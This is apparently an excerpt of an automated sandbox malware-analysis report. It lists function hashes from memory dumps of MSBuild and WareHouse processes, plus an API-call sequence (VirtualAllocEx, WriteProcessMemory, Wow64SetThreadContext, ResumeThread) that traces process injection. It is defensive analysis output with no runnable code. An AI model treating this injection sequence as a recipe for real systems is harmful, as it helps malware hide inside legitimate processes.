                              • Opcode Fuzzy Hash: 54467248f225d8941ea7bdf4b5317025e1b8e2d4adaab78ed0b5494d17de9b6e
                              • Instruction Fuzzy Hash: 13D1A174E04229CFDB64DF69D984BADBBB2BF49304F1090A9D459AB361DB70AD81CF10
                              Function 04E645D8 Relevance: 1.5, Strings: 1, Instructions: 284COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3839037344.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e60000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID: 0o#p
                              • API String ID: 0-2085137917
                              • Opcode ID: 120ac002330f9a7b08eb8adacb8e4c800514a43ac7740bd3fe650750a4b31943
                              • Instruction ID: f64f99987de12a36fab941cca0845d994cdebf8cf0b74e6c93e1e680937b3535
                              • Opcode Fuzzy Hash: 120ac002330f9a7b08eb8adacb8e4c800514a43ac7740bd3fe650750a4b31943
                              • Instruction Fuzzy Hash: 35D1AF74E01218CFDB14DFA9C984B9DBBF2BF89304F1491AAD409AB395DB34A981CF54
                              Function 04E5206A Relevance: 1.1, Instructions: 1122COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3838946954.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3ca7a84d2dc58f32fb876c3eec67dff226347929be4f2368841ca2ddbbfb9520
                              • Instruction ID: 66d30d41088ca0f642c9517d223b58aa81339973f9752c99a5aea801431c755e
                              • Opcode Fuzzy Hash: 3ca7a84d2dc58f32fb876c3eec67dff226347929be4f2368841ca2ddbbfb9520
                              • Instruction Fuzzy Hash: 33828578B00218CBDB65EBFD545076D66E2BFCD700B2084ADD546EF394EE20AD419FA2
                              Function 05B8BF70 Relevance: .9, Instructions: 916COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5b2a852d24ec723808ff4dd72574ab69d0ec66519c0881bdf4e519bb5b438e84
                              • Instruction ID: 8097e20e0317f3fb8fe36f59b0d1677983a46e1bca4100bdc577819a5055fda7
                              • Opcode Fuzzy Hash: 5b2a852d24ec723808ff4dd72574ab69d0ec66519c0881bdf4e519bb5b438e84
                              • Instruction Fuzzy Hash: C9929074A012198FDB64DF68C984AEDFBF2BF48300F1491E9D449AB255D730AE95CFA0
                              Function 05B35867 Relevance: .6, Instructions: 633COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843540424.0000000005B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B30000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b30000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: dc95a431081a7a78c1bbce20476af05df1d60230e7c3ebe197b7d8bdb581efa5
                              • Instruction ID: 14a478cfbc276b46693f24132dcdb32eda8efe62c86c80f6879718ca84b6880b
                              • Opcode Fuzzy Hash: dc95a431081a7a78c1bbce20476af05df1d60230e7c3ebe197b7d8bdb581efa5
                              • Instruction Fuzzy Hash: F5328935A00704CFDB24DF35C58AA6ABBF2FF89304F5488A9E5429B690DB35F881DB51
                              Function 05B39430 Relevance: .6, Instructions: 591COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843540424.0000000005B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B30000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b30000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 743802625016cf768e80ab6c90fd80c63da9a237b40b1d7ff8daa98ae730eed4
                              • Instruction ID: b7e1c7cfd3bc6fb0f4bc0c2bd79babfe9997cdee79a11b866f2d6be387297420
                              • Opcode Fuzzy Hash: 743802625016cf768e80ab6c90fd80c63da9a237b40b1d7ff8daa98ae730eed4
                              • Instruction Fuzzy Hash: F5422974A00705DFC725DF68D485A6AFBF2FF88300B158AA9E44A9B652DB70FC41CB90
                              Function 04E55BA0 Relevance: .6, Instructions: 567COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3838946954.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: dbc06c9344c5b129a1687ea762f189750c4ff1b50b4f24135cc1bfb43e6894ba
                              • Instruction ID: 01f94ffda3f2b0ec4932602c9c382ee4ed47fe906d19ecefd935e09a42fed821
                              • Opcode Fuzzy Hash: dbc06c9344c5b129a1687ea762f189750c4ff1b50b4f24135cc1bfb43e6894ba
                              • Instruction Fuzzy Hash: EA12E231B042119BDB159FB9C4503BEBBE2EF89304F148469E846EB395EB38ED41D7A0
                              Function 04E562A8 Relevance: .5, Instructions: 495COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3838946954.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9c632c0a15ae40c477bcbd9b8da4db97d3f2d78e62e65fdd7989e1027054424d
                              • Instruction ID: 9656a2b800d3ae30ca99bf054c58f26d42d9996929cbecc621c47fcbb51fc8e0
                              • Opcode Fuzzy Hash: 9c632c0a15ae40c477bcbd9b8da4db97d3f2d78e62e65fdd7989e1027054424d
                              • Instruction Fuzzy Hash: B0026071B002198FDB15DFB5C8547AEB7B6BF88304F548069E809EB365DF74AD428B60
                              Function 05B3A0D0 Relevance: .5, Instructions: 458COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843540424.0000000005B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B30000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b30000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 60bcb2a8ed5d54c527b0d6a4a0ac0b759cce30c45003ac0bd8004a4a210b1b37
                              • Instruction ID: aaf562517a137c877e984b49b8bb5b33aea90843a4a7fdf94002c520737e1ccd
                              • Opcode Fuzzy Hash: 60bcb2a8ed5d54c527b0d6a4a0ac0b759cce30c45003ac0bd8004a4a210b1b37
                              • Instruction Fuzzy Hash: CC122974A003058FDB05DF68C584A6ABBF2FF89310B59C4A9E549DB362DB30ED41CB61
                              Function 05B37AB0 Relevance: .4, Instructions: 405COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843540424.0000000005B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B30000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b30000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ac41ff020e113244360385937e68f982c90b3efb7805bad077ae84ffd541e6dc
                              • Instruction ID: f865d07a2394cbc2b7161065157d70122617193f1817a17622188d5cf1718343
                              • Opcode Fuzzy Hash: ac41ff020e113244360385937e68f982c90b3efb7805bad077ae84ffd541e6dc
                              • Instruction Fuzzy Hash: FC028BB5A047058FDB25CF69C485A6ABBF2FF48300F1485A9E846AB761DB30F946CF40
                              Function 04E570D8 Relevance: .4, Instructions: 389COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3838946954.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 667b9b5cb433355d51fb037f57b6e0187a48ab7525ca4a0711491f490c5aae76
                              • Instruction ID: 5d68e9e17d772e080ac9d7d2a88256fcccb403bdc646b273cb865416434d750f
                              • Opcode Fuzzy Hash: 667b9b5cb433355d51fb037f57b6e0187a48ab7525ca4a0711491f490c5aae76
                              • Instruction Fuzzy Hash: D9D15F707002058FDB14EF7AC894AAE7BE6BF89744F148469E815DF364EE74EC418BA1
                              Function 05B898D8 Relevance: .2, Instructions: 165COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 975a8a4e65443229c247be651656ec554a46293eb76af43963e040e056b75d5d
                              • Instruction ID: 1d35c846169a806770dc2614d3a0aeef2a1463b968f4385723b4b0e9e49b0c93
                              • Opcode Fuzzy Hash: 975a8a4e65443229c247be651656ec554a46293eb76af43963e040e056b75d5d
                              • Instruction Fuzzy Hash: FD71BD75E05218CFDB08DFAAD5446EDBBF2FF89301F10906AD815AB254DB346A46CF50
                              Function 04E62984 Relevance: .1, Instructions: 129COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3839037344.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e60000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f7b9e30966aa8b1549a82fdcd6dfc65a735e71952e44d7de2f1d9802a814aeb9
                              • Instruction ID: 19248e19b974a5e1ce51613aafa73034ac94e590f5b586a71877c02cb0d62529
                              • Opcode Fuzzy Hash: f7b9e30966aa8b1549a82fdcd6dfc65a735e71952e44d7de2f1d9802a814aeb9
                              • Instruction Fuzzy Hash: 2F5110B4D003488FDB20DFA9D985BADFBF0FB09304F24A06AE815AB240D774A945CF45
                              Function 05B8BF61 Relevance: .1, Instructions: 127COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5893142c3b95dae24d9b6d660c3c6e47f552b02df5da025181f4150236a2f81f
                              • Instruction ID: 02f99db99eb0cb628ec382a9c7b5f87c774a87f54d4f9dd0dcd896ef08ddd84c
                              • Opcode Fuzzy Hash: 5893142c3b95dae24d9b6d660c3c6e47f552b02df5da025181f4150236a2f81f
                              • Instruction Fuzzy Hash: 8C51D6B1E052198FDB14DF6AC944BEEFBF2BF88304F1491A5D408A7251D774AA85CF50
                              Function 04E67978 Relevance: .1, Instructions: 123COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3839037344.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e60000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: beaddf9dd80e7b346d0a894f87bad904039e09e513ed648ceb77a538fbf12fed
                              • Instruction ID: f81820ec3f8edec3b93313d70a7c31a245a26c9d78b6125b0984d2d1bfd67f17
                              • Opcode Fuzzy Hash: beaddf9dd80e7b346d0a894f87bad904039e09e513ed648ceb77a538fbf12fed
                              • Instruction Fuzzy Hash: 0651B371E006188BEB28CFAAC84479EFBF2BFC8304F15D1AAD409A7255DB3459858F50
                              Function 04E62990 Relevance: .1, Instructions: 120COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3839037344.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e60000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 26f40d7bf8fd7620b0340d79e21b6d8603eae8b7aecaa038ab27854d896b9a14
                              • Instruction ID: 37223b18eef3943a18e95da219f6e70347c36eb3037515cf6577e0990f9bc0c5
                              • Opcode Fuzzy Hash: 26f40d7bf8fd7620b0340d79e21b6d8603eae8b7aecaa038ab27854d896b9a14
                              • Instruction Fuzzy Hash: 1C4100B4D103488FDB20DFA9D984BADFBF1BB09304F24A16AE815AB250D774A945CF45
                              Function 04E645A0 Relevance: .1, Instructions: 111COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3839037344.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e60000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5de690a0756b0b35ab83455d6cb1edabbff5510d7288dad2e348acb20ae8113d
                              • Instruction ID: 6683838502c249f391be3cf6583a502d4d388cefcbf9be9962602d5c34658fcb
                              • Opcode Fuzzy Hash: 5de690a0756b0b35ab83455d6cb1edabbff5510d7288dad2e348acb20ae8113d
                              • Instruction Fuzzy Hash: 5641F2B1E003588FEB18DFAAD85069DBBF3AFC9304F14C06AC419AB265EB345946CF55
                              Function 05B8CD32 Relevance: .1, Instructions: 100COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0cb853b55991469006bbb6be7a8e3666fa020cf9790c22b1b96719668da8c553
                              • Instruction ID: eb35908d7078e7f9771a034f5e39aa1cb43fee6867b880f547b57aa83c26c326
                              • Opcode Fuzzy Hash: 0cb853b55991469006bbb6be7a8e3666fa020cf9790c22b1b96719668da8c553
                              • Instruction Fuzzy Hash: 4141D9B5D052288FEB64DF2AC8407ADBBB3BBC9301F04C0EA845DA7254DB351A95CF50
                              Function 05B8CCDB Relevance: .1, Instructions: 96COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1914178fac89c5e95ee189101732e11594fc3d047486906d1f3f79c1ca3f9efc
                              • Instruction ID: b38ecdf8217c05954022bf6edee136671eb23c87ea1b21c275e6f527f3c1a2b2
                              • Opcode Fuzzy Hash: 1914178fac89c5e95ee189101732e11594fc3d047486906d1f3f79c1ca3f9efc
                              • Instruction Fuzzy Hash: B741D9B5D052688FEB65DF26C8407A9BBB3BBC5301F04C0EAC45CAB261DB355A95CF10
                              Function 04E62088 Relevance: .1, Instructions: 85COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3839037344.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e60000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2ea794ac6cc364102e4bacd291813a7307c575d8aa28c333463a379409d83853
                              • Instruction ID: 4f63e639ba7430850379fd9b22c088e14e7796e54dbdee856a1611190193046e
                              • Opcode Fuzzy Hash: 2ea794ac6cc364102e4bacd291813a7307c575d8aa28c333463a379409d83853
                              • Instruction Fuzzy Hash: A4310571E006088BEB08DFABC9447DEFBF2AF88314F18D169D509AB264DB345946CF55
                              Function 05B89AE8 Relevance: .1, Instructions: 83COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: bf1f9f252926b67cedd6729c460bad684421648478e5dc26f6b127d1b188dc56
                              • Instruction ID: 274b152b2b7c0a516e73691c75dbf1279aadcf0307aa40e6f42d73141a5d1de1
                              • Opcode Fuzzy Hash: bf1f9f252926b67cedd6729c460bad684421648478e5dc26f6b127d1b188dc56
                              • Instruction Fuzzy Hash: 1231B2B1D002188BEB18DFAAD8447EEBBF2AF88300F14C12EC419AB295DB741546CF50
                              Function 04E69902 Relevance: .1, Instructions: 68COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3839037344.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e60000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 57299820fb9274d83a84fd308c1864438785b770a49a9ae0937a30f6722bc7f8
                              • Instruction ID: f3cbc4cc247548c78e2c1bb5d9cc6914736cdcf724b4d6c00e64cc484c5c3724
                              • Opcode Fuzzy Hash: 57299820fb9274d83a84fd308c1864438785b770a49a9ae0937a30f6722bc7f8
                              • Instruction Fuzzy Hash: 73310270A01228CFDB24DF60D948BADBBB1BB89345F1095D9D00A672A1CB745E85CF50

                              Execution Graph

                              Execution Coverage:25.6%
                              Dynamic/Decrypted Code Coverage:100%
                              Signature Coverage:0%
                              Total number of Nodes:27
                              Total number of Limit Nodes:0

                              Executed Functions

                              Function 00007FF886E257A1 Relevance: 2.0, APIs: 1, Instructions: 501processCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              Memory Dump Source
                              • Source File: 0000000A.00000002.1467709291.00007FF886E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_7ff886e20000_WareHouse.jbxd
                              Similarity
                              • API ID: CreateProcess
                              • String ID:
                              • API String ID: 963392458-0
                              • Opcode ID: 1cb34112710352404640d96b9947ebba038281d7af16fb42be6a456b007c1ef1
                              • Instruction ID: 1009e42951361e3f2fa400019758d37753e0ca06b1be0751d557b00716e5cec5
                              • Opcode Fuzzy Hash: 1cb34112710352404640d96b9947ebba038281d7af16fb42be6a456b007c1ef1
                              • Instruction Fuzzy Hash: 7BF14070918A8D8FDBB8DF18C855BF977E1FB59351F10412AE80EDB291DB74AA40CB81
                              Function 00007FF886E2140D Relevance: 1.7, APIs: 1, Instructions: 247networkCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              Memory Dump Source
                              • Source File: 0000000A.00000002.1467709291.00007FF886E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_7ff886e20000_WareHouse.jbxd
                              Similarity
                              • API ID: InternetOpen
                              • String ID:
                              • API String ID: 2038078732-0
                              • Opcode ID: be276939b2566496650a07fb0fc7f7ae7adc1bd81ea1b279ea581330b78415fe
                              • Instruction ID: 1c931a847542f3928ae5e161955b7a8ffb4b811ed6cea5d9d60b1f0bb3509bb6
                              • Opcode Fuzzy Hash: be276939b2566496650a07fb0fc7f7ae7adc1bd81ea1b279ea581330b78415fe
                              • Instruction Fuzzy Hash: 96712470908A5C8FDB98EF58C894BE9BBF1FB69311F1001AED00EE3651DB75A980CB41
                              Function 00007FF886E211E1 Relevance: 1.7, APIs: 1, Instructions: 242networkCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              Memory Dump Source
                              • Source File: 0000000A.00000002.1467709291.00007FF886E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_7ff886e20000_WareHouse.jbxd
                              Similarity
                              • API ID: InternetOpen
                              • String ID:
                              • API String ID: 2038078732-0
                              • Opcode ID: 4db32d8b4f975ca7c85dc461d37881002164f4f7f55dc59f711d8b24f555ffe8
                              • Instruction ID: f5e12d52f94f72093841e87a7ecc1aa456b9a22a93276aae2c1628aeca590b00
                              • Opcode Fuzzy Hash: 4db32d8b4f975ca7c85dc461d37881002164f4f7f55dc59f711d8b24f555ffe8
                              • Instruction Fuzzy Hash: 0F71E270908A1D8FDB98DF58C858BE9BBF2FB69311F1041AED00EE3651DB75A981CB41
                              Function 00007FF886E26291 Relevance: 1.7, APIs: 1, Instructions: 221injectionCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              Memory Dump Source
                              • Source File: 0000000A.00000002.1467709291.00007FF886E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_7ff886e20000_WareHouse.jbxd
                              Similarity
                              • API ID: MemoryProcessWrite
                              • String ID:
                              • API String ID: 3559483778-0
                              • Opcode ID: de2cd26ff1c3c5be46396845e5e8d07a1c799cc345cf32060f055f20d59475dc
                              • Instruction ID: cdd4399bda1edd22b3f026850a5e5ca1dbb8b5c0fb8bb1701ffdb628704f5bb6
                              • Opcode Fuzzy Hash: de2cd26ff1c3c5be46396845e5e8d07a1c799cc345cf32060f055f20d59475dc
                              • Instruction Fuzzy Hash: E4612670D08A1C8FDB94DF58C885BE9BBF1FB69311F1082AAD04CE3252CB74A985CB40
                              Function 00007FF886E260C5 Relevance: 1.7, APIs: 1, Instructions: 201memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 92 7ff886e260c5-7ff886e260d1 93 7ff886e260dc-7ff886e26219 VirtualAllocEx 92->93 94 7ff886e260d3-7ff886e260db 92->94 99 7ff886e2621b 93->99 100 7ff886e26221-7ff886e2628d 93->100 94->93 99->100
                              APIs
                              Memory Dump Source
                              • Source File: 0000000A.00000002.1467709291.00007FF886E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_7ff886e20000_WareHouse.jbxd
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
                              • Opcode ID: cc81e64b93d873e2bda29b57b9d2a0110432a2bac979aa7c95fc1fd57aad32b4
                              • Instruction ID: 9f67b446a3c8573d85dc791be303433c41faeeed1faacc7b5cf0a5c7a95000eb
                              • Opcode Fuzzy Hash: cc81e64b93d873e2bda29b57b9d2a0110432a2bac979aa7c95fc1fd57aad32b4
                              • Instruction Fuzzy Hash: 06512A70908A5C8FDF94EF58C845BE9BBF1FB6A310F1041AAD04DE3251DB75A985CB81
                              Function 00007FF886E21671 Relevance: 1.7, APIs: 1, Instructions: 196filenetworkCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 103 7ff886e21671-7ff886e21715 106 7ff886e2173e-7ff886e217cb InternetReadFile 103->106 107 7ff886e21717-7ff886e2173b 103->107 108 7ff886e217cd 106->108 109 7ff886e217d3-7ff886e21833 106->109 107->106 108->109
                              APIs
                              Memory Dump Source
                              • Source File: 0000000A.00000002.1467709291.00007FF886E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_7ff886e20000_WareHouse.jbxd
                              Similarity
                              • API ID: FileInternetRead
                              • String ID:
                              • API String ID: 778332206-0
                              • Opcode ID: 0355eee7fcca7068c1d9fe4edccb54994ceee3d76e39ba815c8c29773d9d5923
                              • Instruction ID: 521a332253dd3e714fedbd3d822fd2433dd373c0c66ddbdd91c06cf8abef25b5
                              • Opcode Fuzzy Hash: 0355eee7fcca7068c1d9fe4edccb54994ceee3d76e39ba815c8c29773d9d5923
                              • Instruction Fuzzy Hash: 61511770918A1C8FDB58DF98C889BE9BBF1FB69311F1041AED049A3251DB70A985CF81
                              Function 00007FF886E2649D Relevance: 1.7, APIs: 1, Instructions: 193COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 112 7ff886e2649d-7ff886e264a9 113 7ff886e264ab-7ff886e264b3 112->113 114 7ff886e264b4-7ff886e265ef ReadProcessMemory 112->114 113->114 119 7ff886e265f1 114->119 120 7ff886e265f7-7ff886e26659 114->120 119->120
                              APIs
                              Memory Dump Source
                              • Source File: 0000000A.00000002.1467709291.00007FF886E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_7ff886e20000_WareHouse.jbxd
                              Similarity
                              • API ID: MemoryProcessRead
                              • String ID:
                              • API String ID: 1726664587-0
                              • Opcode ID: 274452f48e68d93abeb72e061c71c0d1f7901462cebc0d9f0903559b2f8142a2
                              • Instruction ID: 0fc6f87895bffa62bab87f4acf117b7de09423eb55875467cc4d68d81e2f0e9e
                              • Opcode Fuzzy Hash: 274452f48e68d93abeb72e061c71c0d1f7901462cebc0d9f0903559b2f8142a2
                              • Instruction Fuzzy Hash: F4513770D08A4C8FDB94DF58C885BE9BBF1FB69310F1082AAD44DE3252DB34A985CB41
                              Function 00007FF886E25DCE Relevance: 1.7, APIs: 1, Instructions: 190threadCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 123 7ff886e25dce-7ff886e25ddb 124 7ff886e25ddd-7ff886e25de5 123->124 125 7ff886e25de6-7ff886e25ea2 123->125 124->125 129 7ff886e25ec4-7ff886e25f26 Wow64SetThreadContext 125->129 130 7ff886e25ea4-7ff886e25ec1 125->130 132 7ff886e25f28 129->132 133 7ff886e25f2e-7ff886e25f84 129->133 130->129 132->133
                              APIs
                              Memory Dump Source
                              • Source File: 0000000A.00000002.1467709291.00007FF886E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_7ff886e20000_WareHouse.jbxd
                              Similarity
                              • API ID: ContextThreadWow64
                              • String ID:
                              • API String ID: 983334009-0
                              • Opcode ID: 7acdc0b9cab1d6184a74b1c65594841787c2d4f51f9797d11ec152a554c5cfd2
                              • Instruction ID: cd27fa92bdd3c86a3b0edede18a9b86aa3a46b5b64ef764cf00ed4f00aac7427
                              • Opcode Fuzzy Hash: 7acdc0b9cab1d6184a74b1c65594841787c2d4f51f9797d11ec152a554c5cfd2
                              • Instruction Fuzzy Hash: 06517A70D0864D8FEB55DFA8C845BEDBBF1FB66311F1082AAD048E7252CB749885CB40
                              Function 00007FF886E25FB1 Relevance: 1.6, APIs: 1, Instructions: 125threadCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 136 7ff886e25fb1-7ff886e26070 ResumeThread 140 7ff886e26078-7ff886e260c2 136->140 141 7ff886e26072 136->141 141->140
                              APIs
                              Memory Dump Source
                              • Source File: 0000000A.00000002.1467709291.00007FF886E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_7ff886e20000_WareHouse.jbxd
                              Similarity
                              • API ID: ResumeThread
                              • String ID:
                              • API String ID: 947044025-0
                              • Opcode ID: 599ebda175e2720b454e12e119cd671db07d0906eee02f2fad4579a8409e46cd
                              • Instruction ID: ffc0a7a0d34f8ca00d70c0105030e3841f68b8e60c58ebe8e20ee72f172d7128
                              • Opcode Fuzzy Hash: 599ebda175e2720b454e12e119cd671db07d0906eee02f2fad4579a8409e46cd
                              • Instruction Fuzzy Hash: 7641F870D0860C8FDB98EF98D489AEDBBF1FB59311F10416AD409E7252DA75A885CF41

                              Execution Graph

                              Execution Coverage:12.2%
                              Dynamic/Decrypted Code Coverage:100%
                              Signature Coverage:0%
                              Total number of Nodes:499
                              Total number of Limit Nodes:50
